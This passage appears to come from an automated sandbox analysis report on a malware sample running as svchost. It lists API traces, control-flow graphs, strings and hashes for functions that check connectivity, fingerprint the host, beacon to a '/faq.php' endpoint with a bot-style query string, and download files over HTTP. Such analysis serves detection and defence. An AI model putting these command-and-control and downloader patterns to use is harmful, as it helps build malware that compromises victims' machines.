                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85873
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d, xrefs: 02C856BF
                                                                                                                                                                                                                    • %2b, xrefs: 02C8563C
                                                                                                                                                                                                                    • /faq.php, xrefs: 02C857AC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$memset$Sleep$AdminAttributesCheckConnectionDeleteFreeInternetTempUserValidatelstrcpyn$AliveAllocCacheCountFlushInformationNameNetworkPathResolverTickTimeZone_snprintf
                                                                                                                                                                                                                    • String ID: %2b$/faq.php$id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                                    • API String ID: 3187169398-2843672900
                                                                                                                                                                                                                    • Opcode ID: 020d4efbb3589629bfb2aaeb109eeff45a10eb232319a4c6d9e61087756a5358
                                                                                                                                                                                                                    • Instruction ID: 8833a8bceabfceadb4c51c836d4e23b1a1e0e2c7b996f887b9cde1ca41dd3caf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 020d4efbb3589629bfb2aaeb109eeff45a10eb232319a4c6d9e61087756a5358
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8812A72E80255ABDB25AB749C48FEA7B69EF84344F45C6D0E905D72C0EB70DA04CBA1
                                                                                                                                                                                                                    Function 02C83A35 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 174memorynetworkfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 858 2c83a35-2c83a3c 859 2c83a40-2c83a51 858->859 860 2c83a53 859->860 861 2c83a55-2c83a5c 859->861 860->861 861->859 862 2c83a5e-2c83a8b call 2c86c40 InternetOpenA 861->862 865 2c83d4d-2c83d4f 862->865 866 2c83a91-2c83aac InternetConnectA 862->866 869 2c83d7f-2c83d87 865->869 870 2c83d51-2c83d7c call 2c83620 865->870 867 2c83ab2-2c83abb 866->867 868 2c83d43-2c83d4a InternetCloseHandle 866->868 871 2c83abd 867->871 872 2c83ac2-2c83ae2 HttpOpenRequestA 867->872 868->865 871->872 874 2c83ae8-2c83af6 872->874 875 2c83d39-2c83d40 InternetCloseHandle 872->875 877 2c83af8-2c83afc 874->877 878 2c83b0d-2c83b20 HttpAddRequestHeadersA 874->878 875->868 877->878 881 2c83afe-2c83b0b HttpAddRequestHeadersA 877->881 879 2c83b52-2c83b67 HttpSendRequestA 878->879 880 2c83b22-2c83b50 _snprintf HttpAddRequestHeadersA 878->880 882 2c83d2c-2c83d36 InternetCloseHandle 879->882 883 2c83b6d-2c83b87 HttpQueryInfoA 879->883 880->879 881->878 882->875 883->882 884 2c83b8d-2c83b94 883->884 884->882 885 2c83b9a-2c83bbe CreateFileA 884->885 885->882 886 2c83bc4-2c83bca 885->886 887 2c83bd0-2c83be4 GetProcessHeap RtlAllocateHeap 886->887 888 2c83bea-2c83c17 memset InternetReadFile 887->888 889 2c83c73-2c83c75 887->889 892 2c83c19-2c83c1e 888->892 893 2c83c57-2c83c65 GetProcessHeap HeapValidate 888->893 890 2c83c9a-2c83cac call 2c76570 889->890 891 2c83c77-2c83c8b GetHandleInformation 889->891 901 2c83d29 890->901 902 2c83cb2-2c83cbc 890->902 891->890 895 2c83c8d-2c83c91 891->895 892->893 897 2c83c20-2c83c44 WriteFile GetProcessHeap HeapValidate 892->897 893->889 894 2c83c67-2c83c6d GetProcessHeap HeapFree 893->894 894->889 895->890 898 2c83c93-2c83c94 CloseHandle 895->898 897->887 900 2c83c46-2c83c52 GetProcessHeap HeapFree 897->900 898->890 900->887 901->882 903 2c83cc0-2c83cce 902->903 903->903 904 2c83cd0 903->904 905 2c83cd2-2c83ce3 904->905 906 2c83ce5 905->906 907 2c83ce7-2c83cee 905->907 906->907 907->905 908 2c83cf0-2c83d1b call 2c86c40 call 2c764d0 GetProcessHeap HeapValidate 907->908 908->901 913 2c83d1d-2c83d23 GetProcessHeap HeapFree 908->913 913->901
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C83B38
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83BF2
                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83C3C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83C4C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83C5D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83C6D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C83C94
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C83D10
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83D13
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83D20
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83D23
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83D2D
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83D3A
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83D44
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • POST, xrefs: 02C83ABD, 02C83AD3
                                                                                                                                                                                                                    • GET, xrefs: 02C83AB6
                                                                                                                                                                                                                    • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
                                                                                                                                                                                                                    • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
                                                                                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
                                                                                                                                                                                                                    • Referer: http://www.google.com, xrefs: 02C83B14
                                                                                                                                                                                                                    • HTTP/1.0, xrefs: 02C83ACD
                                                                                                                                                                                                                    • 6b8e26743fcf62a2, xrefs: 02C83B22
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocateConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
                                                                                                                                                                                                                    • String ID: 6b8e26743fcf62a2$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                                    • API String ID: 4276495747-4291293516
                                                                                                                                                                                                                    • Opcode ID: 51e6f5eccb3457e7495455a5e4831cf5c557961665de695fa89b0146f4495580
                                                                                                                                                                                                                    • Instruction ID: 03b87ba596479fec21a927c15e461ff520d988b86805412e4964db04f359d503
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e6f5eccb3457e7495455a5e4831cf5c557961665de695fa89b0146f4495580
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8951B771A802847BEB219F50CC49FEB7B68EF84B18F104698FA05B71C0D7B0AA55CB65
                                                                                                                                                                                                                    Function 02C83695 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 173memorynetworkfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 914 2c83695-2c8369c 915 2c836a0-2c836b1 914->915 916 2c836b3 915->916 917 2c836b5-2c836bc 915->917 916->917 917->915 918 2c836be-2c836ee call 2c86c40 InternetOpenA 917->918 921 2c839ad-2c839b5 918->921 922 2c836f4-2c8370c InternetConnectA 918->922 923 2c8398f-2c8399f InternetCloseHandle 922->923 924 2c83712-2c8371a 922->924 925 2c8371c 924->925 926 2c83721-2c8373e HttpOpenRequestA 924->926 925->926 927 2c83744-2c8374e 926->927 928 2c83985-2c8398c InternetCloseHandle 926->928 929 2c83750-2c83753 927->929 930 2c83764-2c83776 HttpAddRequestHeadersA 927->930 928->923 929->930 931 2c83755-2c83762 HttpAddRequestHeadersA 929->931 932 2c837a8-2c837bb HttpSendRequestA 930->932 933 2c83778-2c837a6 _snprintf HttpAddRequestHeadersA 930->933 931->930 934 2c8397b-2c83982 InternetCloseHandle 932->934 935 2c837c1-2c837db HttpQueryInfoA 932->935 933->932 934->928 935->934 936 2c837e1-2c837e8 935->936 936->934 937 2c837ee-2c83814 CreateFileA 936->937 937->934 938 2c8381a 937->938 939 2c83820-2c83834 GetProcessHeap HeapAlloc 938->939 940 2c8383a-2c83867 memset InternetReadFile 939->940 941 2c838c3-2c838c5 939->941 942 2c83869-2c8386e 940->942 943 2c838a7-2c838b5 GetProcessHeap HeapValidate 940->943 944 2c838ea-2c838fe call 2c76570 941->944 945 2c838c7-2c838db GetHandleInformation 941->945 942->943 947 2c83870-2c83894 WriteFile GetProcessHeap HeapValidate 942->947 943->941 948 2c838b7-2c838bd GetProcessHeap HeapFree 943->948 953 2c83978 944->953 954 2c83900-2c8390a 944->954 945->944 949 2c838dd-2c838e1 945->949 947->939 952 2c83896-2c838a2 GetProcessHeap HeapFree 947->952 948->941 949->944 950 2c838e3-2c838e4 CloseHandle 949->950 950->944 952->939 953->934 955 2c83910-2c8391e 954->955 955->955 956 2c83920 955->956 957 2c83922-2c83933 956->957 958 2c83935 957->958 959 2c83937-2c8393e 957->959 958->959 959->957 960 2c83940-2c8396a call 2c86c40 call 2c764d0 GetProcessHeap HeapValidate 959->960 960->953 965 2c8396c-2c83972 GetProcessHeap HeapFree 960->965 965->953
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8378E
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C8382A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83842
                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8388C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8389C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C838AD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C838BD
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C838E4
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02C8395F
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83962
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8396F
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83972
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C8397C
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83986
                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C83990
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • POST, xrefs: 02C8371C, 02C8372F
                                                                                                                                                                                                                    • GET, xrefs: 02C83712
                                                                                                                                                                                                                    • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
                                                                                                                                                                                                                    • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
                                                                                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
                                                                                                                                                                                                                    • Referer: http://www.google.com, xrefs: 02C8376B
                                                                                                                                                                                                                    • HTTP/1.0, xrefs: 02C83729
                                                                                                                                                                                                                    • 6b8e26743fcf62a2, xrefs: 02C83778
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
                                                                                                                                                                                                                    • String ID: 6b8e26743fcf62a2$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                                    • API String ID: 4235660723-4291293516
                                                                                                                                                                                                                    • Opcode ID: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
                                                                                                                                                                                                                    • Instruction ID: 14c700ebed10ca15fb36dad9405ebaab1b16be7677af05c9bd8b66d4237764b5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5351A7719402847BEB219F54DC89FFB776CEF88B58F008658F905A71C0D7709A55CBA1
                                                                                                                                                                                                                    Function 02C73100 Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 181memoryregistryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 987 2c73100-2c7313a memset call 2c934a0 990 2c732e7-2c732ee 987->990 991 2c73140-2c7314d call 2c935a0 987->991 994 2c73295-2c732ab GetProcessHeap HeapValidate 991->994 995 2c73153-2c73190 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA 991->995 998 2c732ad-2c732b6 GetProcessHeap HeapFree 994->998 999 2c732bc-2c732c1 994->999 996 2c73192 995->996 997 2c73199-2c731b6 RegOpenKeyExA 995->997 996->997 1000 2c731df-2c731e4 997->1000 1001 2c731b8-2c731d9 RegQueryValueExA RegCloseKey 997->1001 998->999 1002 2c732c3-2c732cd GetProcessHeap HeapValidate 999->1002 1003 2c732de-2c732e6 999->1003 1004 2c731e6 1000->1004 1005 2c731e9-2c7321f CharUpperA * 2 _snprintf 1000->1005 1001->1000 1002->1003 1006 2c732cf-2c732d8 GetProcessHeap HeapFree 1002->1006 1004->1005 1007 2c73220-2c73225 1005->1007 1006->1003 1007->1007 1008 2c73227-2c73229 1007->1008 1009 2c7328d-2c73290 1008->1009 1010 2c7322b 1008->1010 1009->994 1011 2c73230-2c73235 1010->1011 1012 2c73236-2c7323c 1011->1012 1012->1012 1013 2c7323e-2c7324d 1012->1013 1014 2c73250-2c73255 1013->1014 1014->1014 1015 2c73257-2c7327d _snprintf 1014->1015 1016 2c73280-2c73285 1015->1016 1016->1016 1017 2c73287-2c7328b 1016->1017 1017->1009 1017->1011
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C73126
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: memset.MSVCRT ref: 02C934D3
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C934E9
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: memset.MSVCRT ref: 02C93501
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: StrChrIA.SHLWAPI(?,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
                                                                                                                                                                                                                      • Part of subcall function 02C934A0: lstrcpynA.KERNEL32(7736C3F0,00000001,00000104,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: memset.MSVCRT ref: 02C935D4
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C935E3
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C935EA
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: memset.MSVCRT ref: 02C93602
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93619
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9361F
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93640
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: StrChrIA.SHLWAPI(?,?,00000000,00000000,?,?,?,?,00000000), ref: 02C93667
                                                                                                                                                                                                                      • Part of subcall function 02C935A0: lstrcpynA.KERNEL32(00000000,00000001,00000104,?,00000000,00000000,?,?,?,?,00000000), ref: 02C9367B
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76232F70,7736C3F0), ref: 02C73164
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?,?,?,76232F70,7736C3F0), ref: 02C73171
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C73188
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76232F70,7736C3F0), ref: 02C731AE
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,02C8598D,?,?,?,76232F70,7736C3F0), ref: 02C731CF
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,76232F70,7736C3F0), ref: 02C731D9
                                                                                                                                                                                                                    • CharUpperA.USER32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C731F4
                                                                                                                                                                                                                    • CharUpperA.USER32(00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C731F8
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73210
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7326F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,76232F70,7736C3F0), ref: 02C7329E
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732A7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732B3
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732B6
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732C6
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732C9
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,76232F70,7736C3F0), ref: 02C732D5
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,76232F70,7736C3F0), ref: 02C732D8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                                    • String ID: %02X$%45%4E%47%49%4E%45%45%52%21%32%32%36%35%33%33%21%31%43%45%33%41%41%44%31$%s!%s!%08X$user!226533!1CE3AAD1$InstallDate$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                                    • API String ID: 3299431409-2925837445
                                                                                                                                                                                                                    • Opcode ID: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
                                                                                                                                                                                                                    • Instruction ID: 75e312b9e7ffe3699f6f3bebc38541af77f4571995b644781dfedd3aa8380b83
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A51C6B1E40295ABDB11CBA59C89FEBBBBCEF84704F0445D5E905E7141E7709A048BA0
                                                                                                                                                                                                                    Function 02C88DD0 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON
